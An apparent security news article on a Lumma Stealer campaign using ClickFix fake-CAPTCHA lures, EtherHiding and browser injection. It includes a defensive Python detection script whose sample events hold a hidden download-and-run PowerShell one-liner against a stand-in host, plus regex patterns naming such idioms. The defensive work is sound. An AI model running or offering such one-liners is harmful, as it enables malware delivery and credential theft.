Lumma Stealer and ClickFix Malware Uncovered: A New Threat to Cybersecurity


Cybercriminals Use Novel Technique to Spread Lumma Stealer Malware

Cybercriminals have been spreading the Lumma Stealer malware with a novel variant of the ClickFix technique that abuses the Windows Terminal app. The campaign, first observed in February, lures victims with a fake CAPTCHA "verification" that instructs them to press Windows + X (which opens the Power User menu, from which Windows Terminal is launched) and then paste a PowerShell command into the terminal. The pasted command is the malicious payload; no exploit is involved, the victim runs the attacker's code by hand.

Attack Chain and Payload

Once the pasted command runs, it spawns further Windows Terminal and PowerShell instances and ultimately retrieves a ZIP payload together with a renamed 7-Zip binary (presumably used to unpack it). From there the attackers establish persistence on the compromised machine, deploy Lumma Stealer, and exfiltrate sensitive data.

Communication with Crypto Blockchain RPC Endpoints

In a separate attack chain, the malicious PowerShell command communicates with cryptocurrency blockchain RPC endpoints, an "EtherHiding" technique in which the next-stage payload is stored in a smart contract and fetched with ordinary read-only node calls, so there is no conventional server to take down. The script then injects code into chrome.exe and msedge.exe processes using the QueueUserAPC() API (asynchronous procedure call injection), which lets the attackers harvest browsing data and login credentials from inside the browsers themselves.
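As an added example (not code from the article, nor from Microsoft), the Python below turns the two chains described above into detection logic run over constructed Sysmon-style events (Event ID 1 process creation, Event ID 10 process access) and PowerShell script block logs (Event ID 4104). It flags a PowerShell process spawned from Windows Terminal with a download-and-run one-liner, a renamed 7-Zip binary caught through its PE OriginalFileName, an EtherHiding-style JSON-RPC read against a blockchain node, and a PowerShell handle to chrome.exe or msedge.exe carrying the memory-write rights that QueueUserAPC() injection needs. Field names follow the real Sysmon and PowerShell 4104 schemas; every path, hostname, URL, contract address and access mask in the sample is invented.

```python
"""Detection checks for the ClickFix -> Lumma Stealer chain (added example, not the
article's or Microsoft's code). Input: constructed Sysmon-style / PowerShell 4104 events;
field names are real, all values are invented for illustration."""
import re
from pathlib import PureWindowsPath

SHELLS = {"powershell.exe", "pwsh.exe"}
BROWSERS = {"chrome.exe", "msedge.exe"}
SEVEN_ZIP_NAMES = {"7z.exe", "7za.exe", "7zg.exe"}
PROCESS_VM_OPERATION = 0x0008  # needed for VirtualAllocEx in a remote process
PROCESS_VM_WRITE = 0x0020      # needed for WriteProcessMemory into a remote process

# Download-and-run / hiding idioms common in pasted ClickFix one-liners.
SUSPICIOUS_CMD = re.compile(
    r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|iex|invoke-expression)\b"
    r"|-(?:e|ec|enc|encodedcommand)\b|-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
# Read-only JSON-RPC calls to an Ethereum-style node: the EtherHiding retrieval step.
ETH_RPC = re.compile(r'"jsonrpc"\s*:\s*"2\.0".*?"method"\s*:\s*"eth_(?:call|getCode)"',
                     re.IGNORECASE | re.DOTALL)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WT = r"C:\Program Files\WindowsApps\Terminal\WindowsTerminal.exe"   # invented path
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
ETHERHIDING_SCRIPT = (  # constructed; the zero address stands in for a real contract
    "Invoke-RestMethod -Uri https://rpc.example.invalid -Method Post -ContentType application/json "
    '-Body \'{"jsonrpc":"2.0","method":"eth_call","params":[{"to":"0x' + "0" * 40
    + '","data":"0x"},"latest"],"id":1}\'')

# Constructed sample telemetry, in the order the events would occur. Events 5 and 6 are
# benign controls: an admin typing a cmdlet, and a system process touching Chrome.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": WT, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "WindowsTerminal.exe", "OriginalFileName": "WindowsTerminal.exe"},
    {"EventID": 1, "Image": PS, "ParentImage": WT, "OriginalFileName": "PowerShell.EXE",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://lure.example.invalid/v -UseBasicParsing | iex"'},
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Temp\svc.exe", "ParentImage": PS,
     "CommandLine": r"svc.exe x C:\Users\alice\AppData\Local\Temp\p.zip -oC:\Users\alice\AppData\Local\Temp\o",
     "OriginalFileName": "7z.exe"},
    {"EventID": 4104, "ScriptBlockText": ETHERHIDING_SCRIPT},
    {"EventID": 10, "SourceImage": PS, "TargetImage": CHROME, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "Image": PS, "ParentImage": WT, "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"powershell -NoProfile -Command Get-ChildItem C:\Users\alice"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": CHROME,
     "GrantedAccess": "0x1400"},
]


def _name(path):
    return PureWindowsPath(path).name.lower()


def is_clickfix_launch(ev):
    """PowerShell started from Windows Terminal with download/hide idioms on its command line.
    A Windows Terminal parent is normal on its own; the pasted one-liner is what gives it away."""
    return (ev.get("EventID") == 1 and _name(ev["Image"]) in SHELLS
            and _name(ev["ParentImage"]) == "windowsterminal.exe"
            and SUSPICIOUS_CMD.search(ev.get("CommandLine", "")) is not None)


def is_renamed_7zip(ev):
    """Sysmon logs the PE's OriginalFileName, which survives renaming the file on disk."""
    return (ev.get("EventID") == 1 and ev.get("OriginalFileName", "").lower() in SEVEN_ZIP_NAMES
            and _name(ev["Image"]) not in SEVEN_ZIP_NAMES)


def is_etherhiding_rpc(ev):
    """Script block that reads from a blockchain node: payload retrieval from a smart contract."""
    return ev.get("EventID") == 4104 and ETH_RPC.search(ev.get("ScriptBlockText", "")) is not None


def is_browser_injection_handle(ev):
    """PowerShell opening a browser process with write rights. APC injection must allocate and
    write the payload into the target before QueueUserAPC(), so the process handle carries
    VM_OPERATION|VM_WRITE even though the later thread handle is not in Sysmon Event ID 10."""
    if ev.get("EventID") != 10:
        return False
    needed = PROCESS_VM_OPERATION | PROCESS_VM_WRITE
    access = int(ev.get("GrantedAccess", "0"), 16)
    return (_name(ev["SourceImage"]) in SHELLS and _name(ev["TargetImage"]) in BROWSERS
            and (access & needed) == needed)


RULES = {"clickfix_terminal_launch": is_clickfix_launch, "renamed_7zip": is_renamed_7zip,
         "etherhiding_rpc": is_etherhiding_rpc, "browser_injection_handle": is_browser_injection_handle}


def triage(events):
    """Return [(rule_name, event_index), ...] for every event that trips a rule."""
    return [(name, i) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, i in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        print(f"{name}: event {i} -> {ev.get('Image') or ev.get('SourceImage') or 'script block'}")
```

Two design points worth noting. The OriginalFileName check is the reliable way to spot the renamed 7-Zip binary, because hashing or file-name matching is exactly what the rename defeats. And because QueueUserAPC() injection never creates a remote thread, Sysmon Event ID 8 (CreateRemoteThread) will not fire; the process-access event with VM_WRITE rights from a scripting host into a browser is the signal to alert on.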

According to Microsoft's Threat Intelligence team, the ClickFix campaign demonstrates how threat actors keep changing their delivery tactics to evade detection and compromise unsuspecting users. Because the chain runs entirely through Windows Terminal and PowerShell, which are legitimate, signed tools present on every workstation, defenders need to log and constrain their use (script block logging, command-line telemetry, execution policy and application control for standard users) rather than rely on blocking a malicious file.

Lumma Stealer Malware and User Vigilance

Lumma Stealer is a notorious information stealer that harvests login credentials, cryptocurrency wallets, and other valuable data from infected machines. Its deployment in the ClickFix campaign underscores the need for users to remain vigilant: no legitimate CAPTCHA or verification step ever asks you to open a terminal and paste a command.

Cat-and-Mouse Game Between Threat Actors and Cybersecurity Professionals

The ClickFix campaign is the latest example of the cat-and-mouse game between threat actors and cybersecurity professionals. As attackers continue to develop new techniques and tactics, it is essential for organizations to stay informed and adapt their security strategies to prevent and detect such threats.
